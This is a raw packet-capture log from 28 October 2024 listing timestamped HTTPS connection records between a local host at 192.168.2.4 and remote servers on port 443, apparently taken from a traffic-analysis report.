                                                                                                                                                                            Oct 28, 2024 19:12:15.743803024 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:15.743875027 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:15.744364977 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:15.744391918 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.594110966 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.594294071 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.596540928 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.596561909 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.596957922 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.610161066 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.655333996 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.812819004 CET49755443192.168.2.44.245.163.56
                                                                                                                                                                            Oct 28, 2024 19:12:16.812926054 CET443497554.245.163.56192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.813008070 CET49755443192.168.2.44.245.163.56
                                                                                                                                                                            Oct 28, 2024 19:12:16.813482046 CET49755443192.168.2.44.245.163.56
                                                                                                                                                                            Oct 28, 2024 19:12:16.813519001 CET443497554.245.163.56192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.831598043 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.831655979 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.831698895 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.831732035 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.831759930 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.831779003 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.831804991 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.880980015 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.881057024 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.881062031 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.881089926 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.881118059 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.881134987 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.994734049 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.994805098 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.994832993 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.994863987 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.994882107 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.994900942 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.997961044 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.998011112 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.998027086 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.998044968 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.998061895 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.998081923 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.999424934 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.999448061 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.999479055 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.999490023 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:16.999512911 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:16.999537945 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.114449024 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.114483118 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.114552021 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.114567995 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.114613056 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.115669012 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.115696907 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.115742922 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.115753889 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.115776062 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.115797997 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.185765028 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.185794115 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.185847998 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.185873985 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.185897112 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.185911894 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.232441902 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.232474089 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.232558966 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.232578993 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.232619047 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.234147072 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.234175920 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.234210968 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.234225035 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.234252930 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.234271049 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.288017035 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.302875996 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.302905083 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.302963972 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.302979946 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.303008080 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.303025961 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.350285053 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.350313902 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.350387096 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.350409031 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.350426912 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.350435972 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.351258993 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.351286888 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.351329088 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.351342916 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.351367950 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.351386070 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.352096081 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.352159977 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.352169991 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.352188110 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.352210999 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.352237940 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.386652946 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.386684895 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.386703968 CET49754443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.386712074 CET4434975413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:17.514087915 CET49756443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:17.514134884 CET4434975613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.419800043 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.419817924 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.420757055 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.421168089 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.421197891 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.421679020 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.421688080 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.421873093 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.422485113 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.422537088 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.422863960 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.422878981 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552208900 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552495956 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552692890 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.552797079 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.552823067 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552831888 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.552839994 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.553256989 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.553498983 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.553555012 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.554828882 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.554841995 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556025982 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556077957 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556185007 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556269884 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.556370974 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556422949 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.557332993 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.557332993 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.557338953 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.557351112 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.559290886 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.559290886 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.559305906 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.559318066 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.559907913 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.561343908 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.561520100 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.562742949 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.562793016 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.562843084 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.564460039 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.564553022 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.564723969 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.576786995 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.576811075 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.576869011 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.577872992 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.577886105 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.578072071 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.578072071 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.578107119 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.578135014 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.580862999 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.580888987 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.580893993 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.580924988 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.580957890 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.581001997 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.581037045 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.581238031 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.581264973 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.582395077 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.582412958 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.582490921 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.583163023 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.583179951 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.332714081 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.333153963 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.333903074 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.334537983 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.334589958 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.335078955 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.335093975 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.336333990 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.336361885 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.336715937 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.336720943 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.341341019 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.341360092 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.341758013 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.341762066 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.342643976 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.342972994 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.342981100 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.343266964 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.343272924 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.346470118 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.346818924 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.346853018 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.347218037 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.347229958 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.471781015 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472151995 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472186089 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472253084 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472259998 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472335100 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472335100 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472343922 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472376108 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472403049 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472606897 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472606897 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472650051 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472676039 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475104094 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475119114 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475142002 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475203991 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475208998 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475263119 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475348949 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.290810108 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.290810108 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.290832996 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.290841103 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.293685913 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.293757915 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.293843985 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.293976068 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.294008970 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.300751925 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.301790953 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.301860094 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.302086115 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.302102089 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.302114010 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.302119017 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.304344893 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.304410934 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.304502964 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.304611921 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.304640055 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.308912992 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.309043884 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.309117079 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.309262991 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.309263945 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.309288025 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.309302092 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.311351061 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.311589956 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.311686993 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312069893 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312104940 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312112093 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312144041 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312159061 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312172890 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312247992 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312339067 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312339067 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312345982 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312352896 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.313494921 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.313560963 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.313644886 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.313798904 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.313832998 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.315299034 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.315346003 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.315414906 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316286087 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316309929 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.316375971 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316452980 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316478968 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.316518068 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316541910 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.201672077 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.201730967 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.203037024 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.203095913 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.203808069 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.203823090 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.204232931 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.204263926 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.204737902 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.204750061 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.339941978 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.340053082 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.340140104 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.340413094 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.340451956 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.340477943 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.340511084 CET4434978413.107.253.45192.168.2.4
